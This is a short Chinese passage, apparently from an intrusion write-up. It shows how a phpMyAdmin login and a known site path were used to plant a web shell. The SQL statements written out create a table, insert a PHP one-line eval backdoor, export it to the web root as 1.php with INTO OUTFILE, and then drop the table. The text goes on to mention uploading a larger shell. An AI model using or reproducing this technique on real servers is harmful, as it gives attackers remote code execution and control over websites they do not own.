有了Phpmyadmin,手里又有网站的路径,于是赶紧导出小马,代码如下:
Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES('<?php @eval($_POST[cmd])?>');
select cmd from a into outfile 'E:\wwwroot\ycvip\wwwroot\1.php';
Drop TABLE IF EXISTS a;
执行后,在网站根目录生成了一句话木马1.php。 {zh1}上传大马。